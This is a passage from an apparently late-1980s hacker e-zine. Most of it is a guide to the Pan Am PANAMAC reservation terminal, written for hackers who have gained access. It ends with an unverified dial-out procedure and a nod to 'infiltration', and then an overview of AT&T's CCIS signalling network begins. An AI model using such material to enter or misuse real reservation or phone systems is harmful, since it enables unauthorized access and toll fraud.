  3177. end up with the SOM.
  3178.  
  3179. I hope this has cleared the confusion and now lets continue.
  3180.  
  3181.  
  3182.                                Part VIII
  3183.                                --------- 
  3184.  
  3185. Host Facts
  3186. ----------
  3187. The Host facts field contains 2 types of entries:
  3188.  
  3189. Other Service Information (OSI) entries which give information about passenger
  3190. so that they can be offered proper assistance or recognition.
  3191.  
  3192. A passengers speaks (SPKS) only a language other than English or Meet and 
  3193. assist (MAAS) and this passenger is elderly and needs assistance.
  3194. [more]       
  3195. Into the OSI goes anything pertinent from age to language, that they should
  3196. know in order to talk to the passwngers as an individual. 
  3197.  
  3198. All the entries in the FAX field begin with digit 4. The code "PA" os used
  3199. to send message to Pan Am only, This special information is entered as follows:
  3200.  
  3201.  
  3202. >4 OSI PA_MAAS PSGR ELDERLY ASSIT IN TRANSIT
  3203.  
  3204. A space is madatory only after PA then free form test is permitted. OSI
  3205. information will be transmitted to the airport so that the appropriate action
  3206. may be taken. In addition, special 4 chracter codes are to be used if the OSI
  3207. details are to be taken transmitted directly to the airport check system.
  3208.  
  3209. >4 OSI PA SPKS SPANISH ONLY
  3210. >4 OSI PA FRTV PA62634678J-STARK/AMR
  3211.  
  3212. If the passenger's description does not match one of the codes listed in the
  3213. system enter the information as free form test after the
  3214. "PA"
  3215. [more]       
  3216. For eg.
  3217.  
  3218. >4 OSI OA VIP MAYOR OF N.Y
  3219.  
  3220. In addition there is a special format to indicate that a passenger is an infant
  3221. (INF) which include the age indicated in months (1yr=12MTS)
  3222.  
  3223. For eg.
  3224.  
  3225. >4 OSI PA INF DAVIDSON/JR MSTR 5MTHS
  3226.  
  3227. Note: If there are two or more infants traveling, seperate OSI entries must
  3228. be made for each other 
  3229.  
  3230.                                 Part IX 
  3231.                                 -------- 
  3232.  
  3233. Special Service Requirements (SSR) entries which require prior arrangements
  3234. for something special to be provided to the passenger at the airport or on
  3235. the plane.
  3236. [more]       
  3237. Entries in this category arrange for a specific item. (e.g. special meal) 
  3238. to be provided on a flight for the passenger, or to advice the Airport the
  3239. passenger is traveling with something which may require advance preparation:
  3240. e.g a large pet in cargo or a large amount of excess baggage. Since we are 
  3241. requesting that a specific items be provided (e.g special meal be put
  3242. on the flight), the entry is made with an action code. At the same time, the
  3243. entry is related to a specific segment(s) in an intinenary and to a particular
  3244. passenger name(s) in the PNR. We need to look at an example. Here is a PNR:
  3245.  
  3246. 1.1 SHAH/BUPENDRA 2.1EZRA/AMR
  3247. 1 PA 66 P 19APR JFKBOM HS2 2145 0015
  3248. RCVD/RLOC-MR SHAH
  3249. FONE-NYC-D 212/555/1234/H
  3250. TKT-026FEBNYC00020
  3251.  
  3252. Mr. Shah wants a vegetarian meal. Here is the entry:
  3253.  
  3254. >4 A VGML FS1 S1 N1
  3255.  
  3256. Lets break this down:
  3257. [more]       
  3258. 4 - 4 field
  3259. A - Means add SCR
  3260. VGML - Vegetarian meal code
  3261. FS1 - Action Code (free sell ) + Number requested.
  3262. S1 - Related to Segment 1
  3263. N1 - Related to Name number 1
  3264.  
  3265. Look at this PNR carefully. The entry relates the special meal in this case
  3266. vegetarian to the first segment (S1) and to the first passenger, Mr. Shah,
  3267. who is name number 1 (N1). When re-displayed, the HA FAX field appears as
  3268. follows:
  3269.  
  3270. HA FAX-SSRVGML.PAHS01 PA0066P19APRJFKBOM 1SHAH/BUPENDER
  3271.  
  3272. Information about Pan Am policy and procedures governing some SSR entries can
  3273. be found in KISSR. Here is a display of the index:
  3274.  
  3275. SSR STATION INFORMATION
  3276.         INDEX
  3277. BASSINETS                    B 
  3278. [more]       SPECIAL MEALS                S
  3279. WHEELCHAIRS                  W
  3280.  
  3281. In the KISSR you will find description and codes for all special meals and 
  3282. facts about the current meal and wheelchair policy. 
  3283.  
  3284. Not all SSR items may be freely sold (FS). The R.M describes the procedure
  3285. for requesting (needing) special service requirements. For example, request
  3286. (NN) on:
  3287.  
  3288.     Special meals within 8 hours of departure
  3289.  
  3290. or 
  3291.  
  3292.     Excess baggage over 150 kilos (350 lbs)
  3293.  
  3294. Looks at this example:
  3295.  
  3296. Mr. C. Tuc in addition to his free allowance has baggage which will weigh
  3297. about 175 Kkilos. The entry will be:
  3298.  
  3299. [more]       >4A XBAG NN 175KGS S1 N2 . RECORDING EQUIPMENT
  3300.  
  3301. XBAG - This is the excess baggage code
  3302. NN - Action code
  3303. 175KGS - Weight in Kilos
  3304. S1 - Segment number
  3305. N2 - Name number 2
  3306. . - This separator which is compulsory
  3307. RECORDING EUIPMENT - Text
  3308.  
  3309.  
  3310. In this case there is also a description of the excess baggage. The description
  3311. or text is mandatory for this entry. The period(.) which acts as a separator
  3312. preceeds the text. All SSR entries regarding excess baggage must include a text
  3313. and may relate to only one passenger
  3314.  
  3315. When redisplayed, the HA FAX field now apprears follows: 
  3316.  
  3317. HA FAX
  3318. 1.SSRVGMLPAGS01 PA0066P19APRJFKBOM 1 SHAH/RMR
  3319. 2.SSRKSMLPAHSO1 PA0066P19APRJFKBOM 1 TUC/AMR
  3320. [more]       3.SSRXBAGPANN0175KG PA0066P19APRJFKBOM 1 TUC/AMR RECORDING EQUIPMENT
  3321.  
  3322. SSR Name relating
  3323. -----------------
  3324. In from of each name is a name item number. You already know that PANAMAC
  3325. assigns numbers for each different surname in a PNR. Also, each passenger
  3326. has a passenger name number. In the FACTS example so far, the item number and
  3327. the passenger name number were the same.
  3328.  
  3329.  
  3330.            A                B                   C
  3331. 1. 1AOKI/LSMRS 2. 1YAMADA/YRMRS 3. I/1YAMADA/GLENMSTR 
  3332.  
  3333. 1,2,3 are Name Item NBR & the A,B,C are passenger name numbers
  3334.  
  3335. When you relate an SSR fact, your entry really refered to the name item i.e
  3336. N2 refers to all the passengers in name item 2 (in this case only Mrs. Yamada)
  3337. If however the entire Yamada family had been travelling together as in the    
  3338. following example the name item include more than one name:
  3339.  
  3340. 1.1AOKI/LSMRS 2.3YAMADA/GOMR/YRMRS/LAMISS 5.1/1YAMADA/GLENMSTR
  3341. [more]       1 PA 82 Y 16 NOV HNLAX HS4 2300 0604
  3342. 1 PA 81 Y 28 NOV LAXHNL HS4 1300 1702
  3343.  
  3344. If you SSR entry showed name relation to name N2, then the request would be for
  3345. all the passengers in NAME ITEM 2... Mr/Mrs/Miss Yamada/
  3346.  
  3347. To show a special request for only one passenger in a name item, use a slash
  3348. (/) after the name number. The slash acts to "separate" an individual
  3349. passenger from the name item may which may include multiple passenger. 
  3350.  
  3351. For example: Mrs Yamada  is name NBR 3. To confirm a baby meal on both flights
  3352. the entry would be:
  3353.  
  3354. >4A BBML FS1 S1/2 N3/
  3355.  
  3356. The N3 indicates the name number only
  3357.  
  3358. Change/Delete/Cancel
  3359. --------------------
  3360.  
  3361. If you are in the process of making an SSR entry and you have ended the
  3362. [more]       transaction, no action has yet been taken on the request, You can therefore
  3363. delete the entry. For example
  3364.  
  3365. >4 3 [change symbol]
  3366.  
  3367. You on the other hand while at home can user "*" which works the same way.
  3368. The 4 is the field, the 3 is the Fact ITEM number .  
  3369.  
  3370. You cannot modify an SSR entry to correct it. If your entry is incorrect, you
  3371. must delete the entry and reenter the correct SSR fact itme.
  3372.  
  3373. In all instance, whether working on a new or retrieved PNR, cancellation of
  3374. an itinenary segement will automatically cancel the related SSR item.
  3375.  
  3376. For e.g. you have booked:
  3377.  
  3378. 1.1BROWN/HARRYMR 2.1TOBAR/EMILEMR
  3379. 1 PA 100 Y 13NOV JFKLHR HS2 1000 2140
  3380.  
  3381. Before ending transaction you notice you accidentally confirmed the wrong date.
  3382. After cancellation of the incorrect segment, the HA FAX SSR item will look 
  3383. [more]       like this:
  3384.  
  3385. HA FAX
  3386. 1.SSRKSMLPA(XX)02 PA0100Y13NOVJFKLHR 1BROWN/HARRYMR 1 TOBAR/EMILEMR
  3387.  
  3388. Cancelled SSR entries will automatically be removed from the PNR when you 
  3389. End Trasaction. Now you would rebook the correct flight and the Kosher meals.
  3390.  
  3391.  
  3392.                                Part X  
  3393.                                ------  
  3394.  
  3395.  
  3396. Other Airlines...General Facts
  3397. ------------------------------
  3398.  
  3399. The GFAX or the General Facts, 3 filed contains the same (2) types of entries
  3400. as the Host Fax...OSI and SSR..Entries in the GFAX are included to outgoing 
  3401. messages to other airlines upon ending trasaction. When an itinerary includes
  3402. space on another airlines, you must use the GFAX field to notify the other    
  3403. airline about the special requirements or service information.
  3404. [more]       
  3405. All entries in GFAX befin with the digit 3. To send "OSI" information to one
  3406. (1) other airlines, use the applicable carrier code. For instance, if the     
  3407. passenger is an infant travelling on PA and AF, you notify Air France that you 
  3408. booked an infant by sending an OSI message. The entry is:
  3409.  
  3410. >3 OSI AF INF JONES/MARK MSTR 5 MTS 
  3411.  
  3412. This is in addition to an OSI entry in the 4 field to notify Pan Am at the
  3413. airport, Thus 2 entries with the same information are required. 
  3414.  
  3415. >4 OSI PA INF JONES/MARK MSTR 5 MTS
  3416.  
  3417. If a passenger's itinenary include more than one other airline, use the letters
  3418. "YY" as the carrier code and make only one GFAX entry. A "YY" will send the
  3419. information to all the airlines in the itinerary.
  3420.  
  3421. >3 OS1 YY INF JONES/MARK MSTR 9 MTS 
  3422.  
  3423. Change/Delete
  3424. -------------  
  3425. [more]       The input to delete an OSI in the GFAX filed is the same as in HFAX.
  3426.  
  3427. >3 1 (change symbol)
  3428.  
  3429. To change an OSI entry in the GFAX field the format is the same. You delete,  
  3430. then reenter the correct information.
  3431.  
  3432. >3 OSI AF.... (NEW INFO)
  3433.  
  3434. GFAX SSR Entries:
  3435. -----------------
  3436. SSR entries for other airlines are very similar to Pan Am HA FAX entries. The
  3437. entry begins with "3A", followed by the segment and name related request.
  3438.  
  3439. For e.g
  3440.  
  3441. >3A KSML NH1 S1 N1
  3442.  
  3443. Breakdown
  3444.  
  3445. 3A - This is the GFAX special service request
  3446. [more]       KSML - Meal code
  3447. NH1 - Action code to request
  3448. S1 - Segment number
  3449. N1 - Name item number.
  3450.  
  3451. Any SSR entry to another airline is always on a request basis (NH)
  3452.  
  3453. The request message is forwarded to the applicable airline(s) and must await
  3454. a reply. Meanwhile, the passenger is adivised the Pan Am has requested the 
  3455. special service from the other airline(s) involved.
  3456.  
  3457. Assume that you have made the following reservations:
  3458.  
  3459. 1.1WILSON/ERMR
  3460. 1 PA  218 Y 26FEB CCSJFK HS1 X 0940 1420
  3461. 2 DL 1425 Y 26FEB JFKSLC HS1   1805 2040
  3462.  
  3463. The passengers desires a vegetarian meal and will be taking his dog (weight
  3464. 30 lbs) with him. To book the SSRs on Pan Am the entries are:
  3465.  
  3466. >4A VGML FS1 S1 N1
  3467. [more]       >4A AVHI FS1 S1 N1 . DOG 30 LBS (AVIH = live animals in hold)
  3468.  
  3469. To book the SSRs on Delta Airlines the entries are:
  3470.  
  3471. >3A VGML NN1 S2 N1
  3472. >3A AVIH NN1 S2 N1 . DOG 30 LBS
  3473.  
  3474. Change/Delete
  3475. -------------
  3476. To cancel or delete items in the GFAX handle exactly as in HFAX.
  3477.  
  3478. Before end Transaction: >3 1 (change symbol)
  3479. On a retrieved PNR: >3 . 1 XX
  3480.  
  3481. Encode/Decode ARIMP Abbreviations
  3482. ---------------------------------
  3483. "ARIMP" codes are abbreviated messages which are used to communicate within
  3484. the airline industry. These are listed in Panamac's "KI" information systems 
  3485. and may be accessed using the following entries:
  3486.  
  3487. To find the code for a message (ENCODE), enter:
  3488. [more]       
  3489. >KI COD _ (using first letter of subject)
  3490.  
  3491. To DECODE an abbreviated message, enter:
  3492.  
  3493. >KI DCO _ (using first letter of subject)
  3494.  
  3495.                                 Part XI
  3496.                                 -------
  3497. Advance Seat Assignments
  3498. ------------------------
  3499. It is Pan Am's policy to assign seats prior to departure only when requested
  3500. by passengers. As you know many of us may want specific seat numbers or certain
  3501. area for e.g  smoking,non-smoking,window seats,aisle.Seats have to be requested
  3502. when the booking is in progress.
  3503.  
  3504. Lets take an example. Lets say you have booked a seat for Mr. Davdison on
  3505. he has requested seat 3A which is in the non-smoking area and in the first     
  3506. class (P) cabin. His entries looks like:
  3507.    
  3508. 1.1DAVIDSON/PLDR
  3509. [more]       1 PA 30 P  19APR JFKLHR HS1 X 1200 1800
  3510. 2 PA 40 P  20APR LHRNBO HS1   100  700
  3511.  
  3512. To book his request a Host Facts entry is made. For e.g:
  3513.  
  3514. >4A NSST NN1 S1 N1 . SEAT 3A
  3515.  
  3516. 4A - Explained before 
  3517. NSST - is code for Non Smoking Seat
  3518. NN1 - is the action code
  3519. S1 - Segment 1
  3520. N1 - Name 1
  3521. . - Separtor which is compulsory
  3522. 3A - This is the requested seat
  3523.  
  3524. If this seat is available then you will get a "*". A display of the PNR will
  3525. show the following:
  3526.  
  3527. 1.1DAVIDSON/PLDR
  3528. 1 PA 30 P 19APR JFKLHR HS1 X 1200 1800
  3529. 2 PA 40 P 20APR LHRNBO HS1   100 700
  3530. [more]       HA FAX-SSRNNSTPANN01 PA0040P19APR JFKLHR 1DAVIDSON/PLDR SEAT 3A
  3531.  
  3532. If the seat is already taken then the output will be:
  3533.  
  3534. RE-CHECK AVAILABILITY/REJECTED DATA FOLLOWS/4SSRNSSPANN01 PA0030
  3535. P19APRJUNJFKLHR 1DAVIDSON/PLDR SEAT 3A
  3536.  
  3537. To print an availability display (seats available) seat map must be displayed.
  3538. Enter:
  3539.  
  3540. >AC /S2 *
  3541.  
  3542. AC - is the availability cabin
  3543. S2 - This is the segment 2 
  3544. * - Display
  3545.  
  3546. You will get something like this:
  3547.  
  3548. -PA0040P019APR JGKLHR 747-121 ZONE MAR AVAILABLE 9
  3549. * MOVIE SHOWN BETWEEN JFKLHR
  3550. A  B          C  D  E  F         G  H  J  K
  3551. [more]       P  P    1                  1           $  
  3552. A* A*   2                  2        C  F 
  3553. $  A*   3                  3        A* A*
  3554. 05----------
  3555.  
  3556. As you can see from the display that the requested seat is taken. The symbol  
  3557. use here is "$". Now lets get into the explanation.
  3558.  
  3559. PA0040P19APR - Flight/Class/Date
  3560. JFKLHR - Board/Off points of the segment booked
  3561. 747-121 - This indicated the equiment used on the flight
  3562. NMR - Zone requested "N" - No smoking
  3563.                      "M" - Movies
  3564.                      "S" - Smoking 
  3565.                      "W" - Without movie
  3566. AVAILABLE 9 - Total number of seats still available to confirm. 
  3567. MOVIE SHOWN BETWEEN JFKLHR - Information on which sector the movie will be 
  3568.                              shown.
  3569. A* - Indicates that if given the option, confirm these seats to passengers
  3570.      first. For e.g Seats 2B 
  3571.                           3A B H J
  3572. [more]       $ - This indicates that it is taken. e.g Seat 1 J 
  3573.                                               2 A
  3574.   - Blank indicates that seats dont exists on the aircraft
  3575. P - Seats behind a partition or bulkhead.
  3576. F - Special seating . People that require special seating ot handling 
  3577. C - Compulsory seat usually assigned to F seats.
  3578. 05-------- - This indicates the last row in the zone and /or compartment
  3579. in this case Premium, First Class.
  3580.  
  3581.  
  3582. Some other commands:
  3583.  
  3584. > AC/S1*S - Use this entry command  if passengers request smoking
  3585. > AC/S1*W - Without movie ( No smoking is assured)
  3586. > AC/S1*WS - Without movie , Smoking specified.
  3587.  
  3588.                                  Part XII
  3589.                                  --------
  3590.  
  3591. When originating a PNR if a passenger decides to cancel and book a different
  3592. flight the seat confirmation will automatically be cancelled as in this
  3593. [more]       example (partial PNR display):
  3594.  
  3595. 1.1BRESLIN/BMS 2.1CARTER/ASFR
  3596. 1 PA 102 Y 26JUN JFKLHR 2100 0840
  3597. HA FAX-SSNSSTPAH02 PA102Y26Y26JUNJFKLHR 1IBRESLIN/BMS 1 CARTERASDR SEAT
  3598. 33 AB
  3599.  
  3600. Segment 1 cancelled
  3601.  
  3602. X1
  3603. NEXT REPLACES 1
  3604. FLT//SEG FACTS CANCELLED
  3605.  
  3606. *R
  3607.  
  3608. 1.1BRESLIN/BMS 2.1CARTER/ASDR
  3609. HA FAX-SSRNSSTPA(XK)02 PA102Y26JUNJFKLHR 1BRESLIN/BMS 1 CARTER/ASOR SEAT
  3610. 33 AB
  3611.  
  3612. Should a passenger wish to verify the seat description and/or location of his
  3613. seat. There is an entry to display a seat map. The entry is: 
  3614. [more]       
  3615. >VSSPA106/31JULIAADLHR*27
  3616.  
  3617. VSS - is the Verify Seat Selection
  3618. 27 - This is the row.
  3619.  
  3620. The response will be:
  3621.  
  3622. PA0106           1AD/LHR          31JUL  
  3623.         Y        747-121     ROWS 27 ZONES LAST ROW F/ 7 C/19 Y/57
  3624.         
  3625. A    B    C        D    E    F    G         H    J     K
  3626. N M  N M  N M    21/NM N M   N M  N M   27/ N M  N M   N M
  3627. |         |____                         |
  3628. |             |                         |
  3629. no smoking    Movie                     ROW Number
  3630.  
  3631. Row 27 is a no-smoking seat, with a movie view, over the wing
  3632.  
  3633.  
  3634.  
  3635. [more]                                        Part XIII
  3636.                                  ---------
  3637.  
  3638. This past will teach you all about hotels. I dont plan to go into details on 
  3639. this but will just make you familiar.
  3640.  
  3641. There are 4 catagories of hotels:
  3642.  
  3643. 1. Intercontinental (IHC) the Grand Metropolitan Hotel chain  
  3644.       (XM Inventory stored in the system
  3645. 2. Sheraton  
  3646.       (XM Inventory stored in the system)
  3647. 3. Other hotels (Special Arrangement)
  3648.       (XP Availability ) 
  3649. 4. Unlisted Hotels
  3650.  
  3651. The XH and XM hotels have the actual inventory of thier rooms stored in 
  3652. the system and together with XP hotels the three types give you immediate
  3653. availability. The hotels with whom Pan Am has a booking agreement are listed in
  3654. a City's Station Information. To display the hotel for a city the input is: 
  3655.  
  3656. [more]       >KIBKKH
  3657.  
  3658. BKK is the 3 letter city code and H stands for Hotels. The response to this
  3659. would be something like:
  3660.  
  3661. BKK STATION INFORMATION
  3662. HOTEL INDEX
  3663. 1000 KENYAN CONTINENTAL
  3664. 1023 SHER BANKOK HOTEL
  3665. 2351 * TAMARIN *
  3666. 2342 ASIA
  3667. :
  3668. etc    
  3669.     
  3670.  
  3671. The hotels are further identified in the hotel Index by a four digit number,
  3672. their name and location if other that the headline City it will be displayed  
  3673. as "* TAMARIN *"
  3674.  
  3675. To determine of the hotel is "XH", "XM" or "XP" and to display details about a 
  3676. hotel the input is:
  3677. [more]       
  3678. >KI[Four digits Hotel Index]
  3679.  
  3680. Here is what the response may look like:
  3681.  
  3682. BKK HOTEL INFORMATION
  3683. 1009  SIAM    INTERCONTINENTAL  
  3684. SIAM INTERCONTINENTAL
  3685. SIOUT PLACE 4290 HACKERS ROAD  * TEL 000000 *        
  3686. SIAMICH     XH XH 0923
  3687. LHTL XH0923    H       C    PVKGBD0N        
  3688. AS TL       EP   BHT        EP    P K   D0N
  3689. 04 00       01JAN-30DEC89    
  3690.        MODR SGLB 1840
  3691.             DBLB 2000
  3692.             TRPB 2390
  3693.              :    :
  3694.              :    :
  3695. GCR - JAN/JUN SGLB 1600 DBLD 1820
  3696.       JUL/DEC SGLB 1600 DBLB 1820
  3697.  
  3698. [more]       NOTE LANAI ROOMS AND GROUND FLOOR ROOM ARE ON PERMANANT REQUEST
  3699. GUEST WILL BE MET AT AIRPORT BY HOTEL REPRESENTATIVE AND ASSISTED TO HOTEL
  3700. :
  3701. :                      
  3702. :
  3703.  
  3704. LOCATION  - CENTERS OF CITY OFF SIAM AQ. WITH EASY
  3705.             ACCESS TO ALL SECTIONS OF THE CITY
  3706.             THREE MAIN FROM ROYAL BKK SPORTS CLUB  
  3707.             NATIONAL STADIUM.
  3708. TRANSPORTATION - 35 MIN BY TAXI ARPT
  3709.                  25 MIN BY TAXI TO DOCK
  3710. SERVICES- ROOM SVC 24 HRS LAUNDRY/VALET 24 HRS
  3711. SPORTS - POOL,GYM ROOM,SHOOTING     
  3712.  
  3713. END
  3714.  
  3715. The sixth line contains the booking code (in this case XH0923)
  3716.  
  3717. This display has been shortened to make things easy.
  3718.  
  3719. [more]       Hotels are booked in 2 ways:
  3720.  
  3721. 1) Short Selling them using HOTEL booking code
  3722.    XH ........ >N1 DBLB XH1122-10OCT  15OCT  MODR
  3723.    XM ........ >N2 SGLB XM1355-05MAR  12 MAR MAXR
  3724.    XP ........ >N1 TWNB XP3087-02JUL 9JUL MODR
  3725.  
  3726. 2) The other way is a Segment entry for UNLISTED.
  3727.    >0 HTL PA NH1 ROM 1N23-JUL-OUT30JUL DBLB MODR DORA
  3728.  
  3729.  
  3730.                                 Part XIV  
  3731.                                 -------- 
  3732. Personell who can access the Pan Am main computer may also be able to call
  3733. out. I am not positively sure about this because this info was recently given
  3734. to me by a Pan Am employee. Enter as follows:
  3735.  
  3736. >HOLD NETCHANNEL 1
  3737.  
  3738. There may be many netchannels in the systems. If it is occupied then it will
  3739. give a "CHANNEL 1 BUSY" error.
  3740. [more]         
  3741. Then it will prompt you for a call out password. This is different from your
  3742. login password. 
  3743.  
  3744. Password : XXXXXXXXXX
  3745.  
  3746. Then the immediatly after that it will give a prompt "#" . This is where you  
  3747. will be able to input digits to call out.      
  3748.  
  3749. # (317)5552322
  3750.  
  3751.  
  3752.                             Part XV [Misc]
  3753.                             -------------- 
  3754.  
  3755. Airline Codes
  3756. -------------
  3757.  
  3758. Pan Am, and all other airlines, use a two-letter airline identification code
  3759. for reservation and ticketing purposes. There is no hard and fast rule as to 
  3760. how the two-letter code is derived. These codes are assigned by IATA/ARC.
  3761. [more]       This list contains some of the worlds major airlines.
  3762.  
  3763. Hope this list will come in handy.
  3764.  
  3765. Airline                 Airline Code     Airline                Airline Code
  3766. ------------------------------------     -----------------------------------
  3767. AER LINGUS                  EI           AEROFLOT                    SU
  3768. AREOLINEAS ARGENTINAS       AR           AERO MEXICO                 AM
  3769. AIR AFRIQUE                 RK           AIR CANADA                  AC
  3770. AIR FRANCE                  AF           AIR INDIA                   AI
  3771. AIR NEW ZEALAND - INT.      TE           ALASKA AIRLINES             AS
  3772. ALITILIA                    AZ           ALOHA AILINES               AQ
  3773. AMERICAN AIRLINES           AA           AUSTRIAN AIRLINES           OS
  3774. AVENSA                      VE           AVIANCA                     AV
  3775. BRITISH AIRWAYS             BA           BWIA INT.                   BW
  3776. CAAC - CHINA                CA           CATHAY PACIFIC AIRWAYS      CX
  3777. CHINA AIRLINES              CI           CONTINENTAL AIRLINES        CO
  3778. CP AIR (CANAIAN PACIFIC)    CP           DELTA AIRLINES              DL
  3779. EASTERN AIRLINES            EA           EL AL                       LY
  3780. GULF AIR                    GF           HAWAIIAN AIRLINES           HA
  3781. IBERIA                      IB           INDIAN AIRWAYS CORP.        IC
  3782. [more]       JAPAN AIR LINES             JL           KLM ROYAL DUTCH AIRLINES    KL
  3783. KOREAN AIR LINES            KE           LACSA                       LR
  3784. LAN-CHILE                   LA           LUFTHANSA                   LH
  3785. LIAT                        LI           MEXICANA                    MX
  3786. NORTHWEST                   NW           OLYMPIC AIRWAYS             OA
  3787. PAN AM                      PA           PIEDMONT AIRLINES           PI
  3788. QANTAS                      QF           SABENA                      SN
  3789. SAS                         SK           SAUDIA                      SV
  3790. SINGAPORE                   SQ           SOUTH AFRICAN               SA
  3791. SWISSAIR                    SR           TAP (AIR PORTUGAL)          TP
  3792. TWA                         TW           UNITED AIRLINES             UA
  3793. US AIR                      AL           VASP AIRWAYS                VP
  3794. VARIG                       RG
  3795.  
  3796.  
  3797.  
  3798. Conclusion
  3799. ----------
  3800.  
  3801. Hope all have found this article of some intrest. My apologies for the lenght.
  3802. I have tried my best to include all major topics that may be usefull to the
  3803. [more]       hacker. I suppose now you know that booking flights is not that easy process.
  3804. So next time please dont start yelling at the poor sales agent for some minor
  3805. problem.
  3806.  
  3807. Using this system can be a lot of fun. Although one can create a major havoc  
  3808. after infiltration. I urge you all not to do any of that sort. This system is 
  3809. quite delicate and one should be very carefull when using it. All the reverse 
  3810. command processes have been included in this article. I have purposely left out
  3811. some commands that proved to be harmfull to the system.
  3812.  
  3813. Under no circumstances am I responsible for this article's contents, for this
  3814. serves only as an educational tool.
  3815.  
  3816. I would like to thank Mr. C of the Pan Am Security Division for all his help.
  3817.  
  3818. If anyone wishes to get in touch with me, I can be contacted at the Hacker's
  3819. Den or at the Phoenix Project.
  3820.  
  3821. Best of luck!
  3822.  
  3823.              Red Knight
  3824. [more]                    @ Phun Magazine Inc.
  3825.              Hackers Den88 (718)358/9209 
  3826.  
  3827.  
  3828.    
  3829. =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
  3830. =                  P/HUN Issue #3, Volume 2: Phile #7 of 11                   =
  3831. =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
  3832.  
  3833.               Common Channel (InterOffice) Signalling: An overview
  3834.               ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  3835.                                By Tubular Phreak
  3836.              
  3837.  
  3838.  References:
  3839.  o - BTJ!
  3840.  o - AT&T comunications
  3841.  o - Tel-Network planing    
  3842.  
  3843. This article will inform you of the stages CCS has gone through over the past
  3844. years.
  3845. [more]       CSC known originally as Common Channel Interoffice Signalling was introduced
  3846. back in 1976. Since its introduction it has added datagram direct signalling
  3847. and has been modernized  by new digital and proccesor technology 
  3848. and by delvelopments in software enginerring techniques.
  3849. This prevents Blue Boxing due to the fact that signals are carried over a 
  3850. different link than voice.     
  3851. CCIS net improved its the old trunk signalling bettween SPC (Stored Control
  3852. Program) toll switches thereby increasing speed and its economical.         
  3853. The CCIS network was composed of what know as STPs(Singal Trasfer Points)
  3854.  
  3855.  
  3856.        CCIS Network                                       
  3857.        ------------                                       
  3858.  
  3859.  Region #1      + Region #2
  3860.  **             +         **
  3861.   |             +          |
  3862.   |             +          |
  3863.   |             +          |
  3864. (SPC)------**      **----(SPC)
  3865.   |________________________|  
  3866. [more]       
  3867. ** - STP mated pair
  3868. __ - Voice Trunks
  3869. |  - Links
  3870. + - Divider
  3871.  
  3872.  
  3873. The Datalinks use 2.4 kb/s(kilobytes per second).In 1979 they used 1A switch
  3874. was added.
  3875.  
  3876. Later in 80 they added a special feature of direct signalling (datagram)
  3877. which operate at 4.8 kb/s. This capability provided the SPC machines with
  3878. the neccesary information through the CCIS Net.The allowed NCP (Network Control
  3879. Points). The NCPs connect directly to CCIS at certain STPs.
  3880. The SPC machines quired the NCPs and receives the instructions for the action
  3881. in response.Therefore they became known as ACPs(Action Control Points).
  3882. This status if the CCIS provided 800 services and calling cards.
  3883.  
  3884. In 1985 the siganlling network added 2STPs and 56kb/s.This new network was     
  3885. called CCS7. This new method of signalling used CCITT No.7 Protocol and with
  3886. it new more efficient feature came like ISDN.
  3887. [more]       
  3888.                           Archaic CCIS in 76'
  3889.                           ~~~~~~~~~~~~~~~~~~
  3890. Before the introduction of CCIS, SF/MF signalling method was in use.
  3891. The SF was responsible in determining the idle/busy side state of a trunk.
  3892. 2600 Hz the idle trunk was removed when a call was to be placed on the trunk.
  3893. Then MF signaling was used to determine  routing information to the distant
  3894. end and when the party answered the SF was removed from there side.
  3895.  
  3896. Tandem switching was not economical and was slow.
  3897.  
  3898. As the introduction of SPC came about in which common control equipment was
  3899. based on electronic procedures, the overhead associated with the call setup
  3900. became a more dominant factor. MF/SF signaling was used until a toll switch
  3901. ESS4 was introduced in 76'. Therefore AT&T produced CCIS in assocation with
  3902. the ESS4 toll switch. Signalling used a different link than voice.
  3903. As mentioned above CCIS used 2.4/kb signalling links to transmit the signal.
  3904. Due to the fact that one 2.4/kb could could provide for more than 2000 trunks,
  3905. therfore the a regional STP was put in place.
  3906. Each STP was connected to several toll switches.Each regional STP was connected
  3907. to each of the distant STPs.Each STP was connected to its parner which provided
  3908. [more]       a path for connections between switches if there was a failure of distant STPs
  3909. The STPs in the network were provided by a portion of the processor associated 
  3910. with the 4A-ETS(Electronic Translator Systems). Message routine within the   
  3911. STPs was performed by a band and lable scheme that defined a virtual signalling
  3912. circuit where 512 bands of 16 trunks coule be accomodated. This allows 8192 
  3913. voice trunks to be uniquely identified on a specific signaling link.
  3914.  
  3915.                      Direct Dialing Signalling(1980)
  3916.                      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 
  3917. In 1980, a direct signalling capability was added to the CCIS Network. This 
  3918. capability allwed messages to be sent from a signalling point to any other
  3919. signalling point in the network and supported a new network architechture in 
  3920. which a portion if the switched network routing instruction could be placed an 
  3921. a database shared by multiple SPC switches.               
  3922. These common databases became known as network control points (NCPs). The SPC 
  3923. switches became known as action points (ACPs). because they performed actions
  3924. based on instructions from NCPs. This required an inquiry-response in the
  3925. Common Channel Interoffice Network.
  3926.  
  3927. This communication between ACPs and NCPs was performed by a new feature called
  3928. Datagram Direct Signalling. Unlike banded(trunk) signalling. This method of
  3929. [more]       signalling directed messages on a destination-routing basis through all the
  3930. Singal Tranfer Points. Therefore the direct signalling messages included a 
  3931. unique destination address that was used by the STPs to route the message based
  3932. on a table that associated destination addresses with physical points in the
  3933. network. With this, the CCIS network could direct messages to individual
  3934. functions allowing the introduction of unique services such as advanced 800
  3935. with features like time of day routing call prompter and customer-controlled
  3936. routing of traffic based on information stored at central databases.
  3937.  
  3938.                          CCIS Network Growth 
  3939.                          ~~~~~~~~~~~~~~~~~~~
  3940. As the AT&T network grew both in terms of SPC swicthes and volume of traffic,
  3941. it became necessary to augment the initial CCIS network capability. First the 
  3942. number of STP pairs was increased from the initial 10 pairs to 16 pairs.
  3943. Three of the additional -airs were used as area STPs, which served the trunking
  3944. needs of the portion of the network. The remaining 3 STP pairs were associated 
  3945. directly with NCP pairs and performed a direct signal funtion. In addition
  3946. the message handling capacity of the network was increased by deploying 4-8kb/s
  3947. signalling links in place of the original 2.4kb/s links.STP processing capacity
  3948. was also increased as the original shared use of the ETS processor was removed
  3949. when the switch function at each STP location was transfered to a new 4 Elect-
